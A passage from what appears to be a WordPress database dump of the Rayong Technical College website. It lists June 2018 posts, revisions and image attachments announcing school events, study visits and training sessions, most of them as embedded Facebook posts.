style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ทักษะชาตื.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ทักษะพื้นฐาน ระดับชาติ ครั้งที่ ๒๗</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม </a><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\"> ทักษะพื้นฐาน ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ </a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ระดับอาชีวศึกษาจังหวัดระยอง</a></span></h4>\r\n \r\n\r\nhttps://youtu.be/6GHMLwQ-sI8\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&amp;feature=youtu.be\r\n\r\n \r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-06-20 12:23:47', '2018-06-20 05:23:47', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(3125, 3, '2018-06-21 13:45:56', '2018-06-21 06:45:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594493174260208%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ สำนักงานคลังจังหวัดระยอง จัดกิจกรรมให้ความรู้เบื้องต้นเกี่ยวกับการสร้างแรงจูงใจในการเป็นผู้ประกอบการที่ดีแก่กลุ่มนักเรียน Startup club กลุ่มร้านอาหารใบชะมวง ในวันพุธที่ 6 มิถุนายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%a3%e0%b9%88-2', '', '', '2018-06-21 13:45:56', '2018-06-21 06:45:56', '', 0, 'http://www.technicrayong.ac.th/?p=3125', 392, 'post', '', 0),
(3126, 3, '2018-06-21 13:43:27', '2018-06-21 06:43:27', '', '34726512_594491797593679_6397404214603022336_o', '', 'inherit', 'closed', 'closed', '', '34726512_594491797593679_6397404214603022336_o', '', '', '2018-06-21 13:43:27', '2018-06-21 06:43:27', '', 3125, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/34726512_594491797593679_6397404214603022336_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3127, 3, '2018-06-21 13:45:56', '2018-06-21 06:45:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594493174260208%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ สำนักงานคลังจังหวัดระยอง จัดกิจกรรมให้ความรู้เบื้องต้นเกี่ยวกับการสร้างแรงจูงใจในการเป็นผู้ประกอบการที่ดีแก่กลุ่มนักเรียน Startup club กลุ่มร้านอาหารใบชะมวง ในวันพุธที่ 6 มิถุนายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'inherit', 'closed', 'closed', '', '3125-revision-v1', '', '', '2018-06-21 13:45:56', '2018-06-21 06:45:56', '', 3125, 'http://www.technicrayong.ac.th/3125-revision-v1/', 0, 'revision', '', 0),
(3128, 3, '2018-06-21 13:46:10', '2018-06-21 06:46:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594493174260208%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ สำนักงานคลังจังหวัดระยอง จัดกิจกรรมให้ความรู้เบื้องต้นเกี่ยวกับการสร้างแรงจูงใจในการเป็นผู้ประกอบการที่ดีแก่กลุ่มนักเรียน Startup club กลุ่มร้านอาหารใบชะมวง ในวันพุธที่ 6 มิถุนายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'inherit', 'closed', 'closed', '', '3125-autosave-v1', '', '', '2018-06-21 13:46:10', '2018-06-21 06:46:10', '', 3125, 'http://www.technicrayong.ac.th/3125-autosave-v1/', 0, 'revision', '', 0),
(3129, 3, '2018-06-21 13:50:50', '2018-06-21 06:50:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594499564259569%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สำนักงานมาตรฐานผลิตภัณฑ์อุตสาหกรรม จัดฝึกอบรมหลักสูตรความรู้ด้านมาตรฐาน ระดับอาชีวศึกษา ให้แก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ในวันอังคารที่ 5 มิถุนายน 2561 ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%b3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%90%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%b4%e0%b8%95%e0%b8%a0%e0%b8%b1%e0%b8%93', '', '', '2018-06-21 13:50:50', '2018-06-21 06:50:50', '', 0, 'http://www.technicrayong.ac.th/?p=3129', 391, 'post', '', 0),
(3130, 3, '2018-06-21 13:50:31', '2018-06-21 06:50:31', '', '34533755_594498194259706_5491926470387302400_o', '', 'inherit', 'closed', 'closed', '', '34533755_594498194259706_5491926470387302400_o', '', '', '2018-06-21 13:50:31', '2018-06-21 06:50:31', '', 3129, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/34533755_594498194259706_5491926470387302400_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3131, 3, '2018-06-21 13:50:50', '2018-06-21 06:50:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594499564259569%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สำนักงานมาตรฐานผลิตภัณฑ์อุตสาหกรรม จัดฝึกอบรมหลักสูตรความรู้ด้านมาตรฐาน ระดับอาชีวศึกษา ให้แก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ในวันอังคารที่ 5 มิถุนายน 2561 ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'inherit', 'closed', 'closed', '', '3129-revision-v1', '', '', '2018-06-21 13:50:50', '2018-06-21 06:50:50', '', 3129, 'http://www.technicrayong.ac.th/3129-revision-v1/', 0, 'revision', '', 0),
(3132, 3, '2018-06-21 13:51:00', '2018-06-21 06:51:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594499564259569%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สำนักงานมาตรฐานผลิตภัณฑ์อุตสาหกรรม จัดฝึกอบรมหลักสูตรความรู้ด้านมาตรฐาน ระดับอาชีวศึกษา ให้แก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ในวันอังคารที่ 5 มิถุนายน 2561 ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ', '', 'inherit', 'closed', 'closed', '', '3129-autosave-v1', '', '', '2018-06-21 13:51:00', '2018-06-21 06:51:00', '', 3129, 'http://www.technicrayong.ac.th/3129-autosave-v1/', 0, 'revision', '', 0),
(3133, 3, '2018-06-21 13:53:29', '2018-06-21 06:53:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594508794258646%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศึกษาดูงานเกี่ยวกับสถานศึกษาคุณธรรม ณ วิทยาลัยการอาชีพบ้านโป่ง และ และศึกษาดูงานที่ บริษัท SCG Packaging อำเภอบ้านโป่ง จังหวัดราชบุรี ในวันพุธที่ 6 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%94%e0%b8%b9%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%96%e0%b8%b2', '', '', '2018-06-21 13:53:29', '2018-06-21 06:53:29', '', 0, 'http://www.technicrayong.ac.th/?p=3133', 390, 'post', '', 0),
(3134, 3, '2018-06-21 13:53:16', '2018-06-21 06:53:16', '', '34725774_594506590925533_2943220566871506944_o', '', 'inherit', 'closed', 'closed', '', '34725774_594506590925533_2943220566871506944_o', '', '', '2018-06-21 13:53:16', '2018-06-21 06:53:16', '', 3133, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/34725774_594506590925533_2943220566871506944_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3135, 3, '2018-06-21 13:53:29', '2018-06-21 06:53:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594508794258646%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศึกษาดูงานเกี่ยวกับสถานศึกษาคุณธรรม ณ วิทยาลัยการอาชีพบ้านโป่ง และ และศึกษาดูงานที่ บริษัท SCG Packaging อำเภอบ้านโป่ง จังหวัดราชบุรี ในวันพุธที่ 6 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3133-revision-v1', '', '', '2018-06-21 13:53:29', '2018-06-21 06:53:29', '', 3133, 'http://www.technicrayong.ac.th/3133-revision-v1/', 0, 'revision', '', 0),
(3136, 3, '2018-06-21 13:53:41', '2018-06-21 06:53:41', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D594508794258646%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศึกษาดูงานเกี่ยวกับสถานศึกษาคุณธรรม ณ วิทยาลัยการอาชีพบ้านโป่ง และ และศึกษาดูงานที่ บริษัท SCG Packaging อำเภอบ้านโป่ง จังหวัดราชบุรี ในวันพุธที่ 6 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3133-autosave-v1', '', '', '2018-06-21 13:53:41', '2018-06-21 06:53:41', '', 3133, 'http://www.technicrayong.ac.th/3133-autosave-v1/', 0, 'revision', '', 0),
(3138, 3, '2018-06-21 13:56:38', '2018-06-21 06:56:38', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D596981647344694%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท อีเล็คโทรลักซ์ ประเทศไทย จำกัด เข้าเยี่ยมชม เพื่อศึกษาดูรายละเอียดเกี่ยวกับการเรียน การสอน การปฏิบัติงาน เพื่อจัดทำสัญญา MOU กับทางวิทยาลัยฯ วันอังคารที่ 12 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-%e0%b8%ad%e0%b8%b5%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%84%e0%b9%82%e0%b8%97%e0%b8%a3%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%8b%e0%b9%8c-%e0%b8%9b%e0%b8%a3', '', '', '2018-06-21 14:10:06', '2018-06-21 07:10:06', '', 0, 'http://www.technicrayong.ac.th/?p=3138', 389, 'post', '', 0),
(3139, 3, '2018-06-21 13:56:38', '2018-06-21 06:56:38', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D596981647344694%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท อีเล็คโทรลักซ์ ประเทศไทย จำกัด เข้าเยี่ยมชม เพื่อศึกษาดูรายละเอียดเกี่ยวกับการเรียน การสอน การปฏิบัติงาน เพื่อจัดทำสัญญา MOU กับทางวิทยาลัยฯ วันอังคารที่ 12 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3138-revision-v1', '', '', '2018-06-21 13:56:38', '2018-06-21 06:56:38', '', 3138, 'http://www.technicrayong.ac.th/3138-revision-v1/', 0, 'revision', '', 0),
(3141, 3, '2018-06-21 14:10:17', '2018-06-21 07:10:17', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D596981647344694%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท อีเล็คโทรลักซ์ ประเทศไทย จำกัด เข้าเยี่ยมชม เพื่อศึกษาดูรายละเอียดเกี่ยวกับการเรียน การสอน การปฏิบัติงาน เพื่อจัดทำสัญญา MOU กับทางวิทยาลัยฯ วันอังคารที่ 12 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3138-autosave-v1', '', '', '2018-06-21 14:10:17', '2018-06-21 07:10:17', '', 3138, 'http://www.technicrayong.ac.th/3138-autosave-v1/', 0, 'revision', '', 0),
(3142, 3, '2018-06-21 14:09:38', '2018-06-21 07:09:38', '', '35142235_596981230678069_5008252112782491648_o', '', 'inherit', 'closed', 'closed', '', '35142235_596981230678069_5008252112782491648_o', '', '', '2018-06-21 14:09:38', '2018-06-21 07:09:38', '', 3138, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35142235_596981230678069_5008252112782491648_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3143, 3, '2018-06-21 14:14:58', '2018-06-21 07:14:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598240950552097%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท โฮม โปรดักส์ เซ็นเตอร์ จำกัด(มหาชน) จัดกิจกรรมประชุมทำความเข้าใจการดำเนินการศึกษาระบบทวิภาคี และประชาสัมพันธ์แนะแนวศึกษาต่อให้แก่นักศึกษา เพื่อส่งเสริมนโยบายการศึกษามุ่งเน้นให้นักศึกษาที่สำเร็จการศึกษาสามารถปฏิบัติงานได้จริง ตรงตามต้องการของสถานประกอบการ รวมถึงการรองรับการขยายตัวทางธุรกิจของบริษัทฯที่มีความต้องการกำลังคนด้านอาชีวศึกษา ณ ห้องประชุมสัมมนาอาชีวศึกษา วันพุธที่ 13 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-%e0%b9%82%e0%b8%ae%e0%b8%a1-%e0%b9%82%e0%b8%9b%e0%b8%a3%e0%b8%94%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b9%8c-%e0%b9%80%e0%b8%8b%e0%b9%87%e0%b8%99-2', '', '', '2018-06-21 14:14:58', '2018-06-21 07:14:58', '', 0, 'http://www.technicrayong.ac.th/?p=3143', 388, 'post', '', 0),
(3144, 3, '2018-06-21 14:14:44', '2018-06-21 07:14:44', '', '35297253_598240157218843_4215476333343408128_o', '', 'inherit', 'closed', 'closed', '', '35297253_598240157218843_4215476333343408128_o', '', '', '2018-06-21 14:14:44', '2018-06-21 07:14:44', '', 3143, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35297253_598240157218843_4215476333343408128_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3145, 3, '2018-06-21 14:14:58', '2018-06-21 07:14:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598240950552097%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท โฮม โปรดักส์ เซ็นเตอร์ จำกัด(มหาชน) จัดกิจกรรมประชุมทำความเข้าใจการดำเนินการศึกษาระบบทวิภาคี และประชาสัมพันธ์แนะแนวศึกษาต่อให้แก่นักศึกษา เพื่อส่งเสริมนโยบายการศึกษามุ่งเน้นให้นักศึกษาที่สำเร็จการศึกษาสามารถปฏิบัติงานได้จริง ตรงตามต้องการของสถานประกอบการ รวมถึงการรองรับการขยายตัวทางธุรกิจของบริษัทฯที่มีความต้องการกำลังคนด้านอาชีวศึกษา ณ ห้องประชุมสัมมนาอาชีวศึกษา วันพุธที่ 13 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3143-revision-v1', '', '', '2018-06-21 14:14:58', '2018-06-21 07:14:58', '', 3143, 'http://www.technicrayong.ac.th/3143-revision-v1/', 0, 'revision', '', 0),
(3146, 3, '2018-06-21 14:15:12', '2018-06-21 07:15:12', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598240950552097%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท โฮม โปรดักส์ เซ็นเตอร์ จำกัด(มหาชน) จัดกิจกรรมประชุมทำความเข้าใจการดำเนินการศึกษาระบบทวิภาคี และประชาสัมพันธ์แนะแนวศึกษาต่อให้แก่นักศึกษา เพื่อส่งเสริมนโยบายการศึกษามุ่งเน้นให้นักศึกษาที่สำเร็จการศึกษาสามารถปฏิบัติงานได้จริง ตรงตามต้องการของสถานประกอบการ รวมถึงการรองรับการขยายตัวทางธุรกิจของบริษัทฯที่มีความต้องการกำลังคนด้านอาชีวศึกษา ณ ห้องประชุมสัมมนาอาชีวศึกษา วันพุธที่ 13 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3143-autosave-v1', '', '', '2018-06-21 14:15:12', '2018-06-21 07:15:12', '', 3143, 'http://www.technicrayong.ac.th/3143-autosave-v1/', 0, 'revision', '', 0),
(3147, 3, '2018-06-21 14:17:50', '2018-06-21 07:17:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598251567217702%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศึกษาดูงาน ภายใต้โครงการศึกษาดูงานด้านวิชาการ ณ วิทยาลัยเทคนิคสุรินทร์ เพื่อพัฒนาศักยภาพบุคลากรทางการศึกษา ตลอดจนเสริมสร้างประสบการณ์แลกเปลี่ยนการเรียนรู้ของครูและบุคลากรทางการศึกษามาเป็นแนวทางปรับใช้ทางด้านการเรียนการสอนให้มีประสิทธิภาพ วันพุธที่ 13 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%94%e0%b8%b9%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%a0%e0%b8%b2%e0%b8%a2%e0%b9%83%e0%b8%95%e0%b9%89%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2', '', '', '2018-06-21 14:17:50', '2018-06-21 07:17:50', '', 0, 'http://www.technicrayong.ac.th/?p=3147', 387, 'post', '', 0),
(3148, 3, '2018-06-21 14:17:20', '2018-06-21 07:17:20', '', '35328349_598250797217779_1225336852240662528_o', '', 'inherit', 'closed', 'closed', '', '35328349_598250797217779_1225336852240662528_o', '', '', '2018-06-21 14:17:20', '2018-06-21 07:17:20', '', 3147, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35328349_598250797217779_1225336852240662528_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3149, 3, '2018-06-21 14:17:50', '2018-06-21 07:17:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598251567217702%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศึกษาดูงาน ภายใต้โครงการศึกษาดูงานด้านวิชาการ ณ วิทยาลัยเทคนิคสุรินทร์ เพื่อพัฒนาศักยภาพบุคลากรทางการศึกษา ตลอดจนเสริมสร้างประสบการณ์แลกเปลี่ยนการเรียนรู้ของครูและบุคลากรทางการศึกษามาเป็นแนวทางปรับใช้ทางด้านการเรียนการสอนให้มีประสิทธิภาพ วันพุธที่ 13 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3147-revision-v1', '', '', '2018-06-21 14:17:50', '2018-06-21 07:17:50', '', 3147, 'http://www.technicrayong.ac.th/3147-revision-v1/', 0, 'revision', '', 0),
(3150, 3, '2018-06-21 14:18:01', '2018-06-21 07:18:01', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598251567217702%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ศึกษาดูงาน ภายใต้โครงการศึกษาดูงานด้านวิชาการ ณ วิทยาลัยเทคนิคสุรินทร์ เพื่อพัฒนาศักยภาพบุคลากรทางการศึกษา ตลอดจนเสริมสร้างประสบการณ์แลกเปลี่ยนการเรียนรู้ของครูและบุคลากรทางการศึกษามาเป็นแนวทางปรับใช้ทางด้านการเรียนการสอนให้มีประสิทธิภาพ วันพุธที่ 13 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3147-autosave-v1', '', '', '2018-06-21 14:18:01', '2018-06-21 07:18:01', '', 3147, 'http://www.technicrayong.ac.th/3147-autosave-v1/', 0, 'revision', '', 0),
(3151, 3, '2018-06-21 14:23:10', '2018-06-21 07:23:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598399593869566%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมกับ ศูนย์เทคโนโลยีอิเล็กทรอนิกส์และคอมพิวเตอร์แห่งชาติ (NECTEC) ดำเนินโครงการอบรมเชิงปฏิบัติการ \"การพัฒนาอุปกรณ์และบริการ Internet of Ting (IOT)\" ภายใต้โครงการ NETPIE Train The Trainer เพื่อพัฒนาบุคลากรครูในสังกัดสถาบันการอาชีวศึกษาภาคตะวันออก ระหว่างวันที่ 14-15 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%84-2', '', '', '2018-06-21 14:25:39', '2018-06-21 07:25:39', '', 0, 'http://www.technicrayong.ac.th/?p=3151', 386, 'post', '', 0),
(3152, 3, '2018-06-21 14:22:56', '2018-06-21 07:22:56', '', '35196910_598394787203380_8022261621957066752_o', '', 'inherit', 'closed', 'closed', '', '35196910_598394787203380_8022261621957066752_o', '', '', '2018-06-21 14:22:56', '2018-06-21 07:22:56', '', 3151, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35196910_598394787203380_8022261621957066752_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3153, 3, '2018-06-21 14:23:10', '2018-06-21 07:23:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598399593869566%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมกับ ศูนย์เทคโนโลยีอิเล็กทรอนิกส์และคอมพิวเตอร์แห่งชาติ (NECTEC) ดำเนินโครงการอบรมเชิงปฏิบัติการ \"การพัฒนาอุปกรณ์และบริการ Internet of Ting (IOT)\" ภายใต้โครงการ NETPIE Train The Trainer เพื่อพัฒนาบุคลากรครูในสังกัดสถาบันการอาชีวศึกษาภาคตะวันออก ระหว่างวันที่ 14-15 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3151-revision-v1', '', '', '2018-06-21 14:23:10', '2018-06-21 07:23:10', '', 3151, 'http://www.technicrayong.ac.th/3151-revision-v1/', 0, 'revision', '', 0),
(3154, 3, '2018-06-21 14:25:49', '2018-06-21 07:25:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D598399593869566%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมกับ ศูนย์เทคโนโลยีอิเล็กทรอนิกส์และคอมพิวเตอร์แห่งชาติ (NECTEC) ดำเนินโครงการอบรมเชิงปฏิบัติการ \"การพัฒนาอุปกรณ์และบริการ Internet of Ting (IOT)\" ภายใต้โครงการ NETPIE Train The Trainer เพื่อพัฒนาบุคลากรครูในสังกัดสถาบันการอาชีวศึกษาภาคตะวันออก ระหว่างวันที่ 14-15 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3151-autosave-v1', '', '', '2018-06-21 14:25:49', '2018-06-21 07:25:49', '', 3151, 'http://www.technicrayong.ac.th/3151-autosave-v1/', 0, 'revision', '', 0),
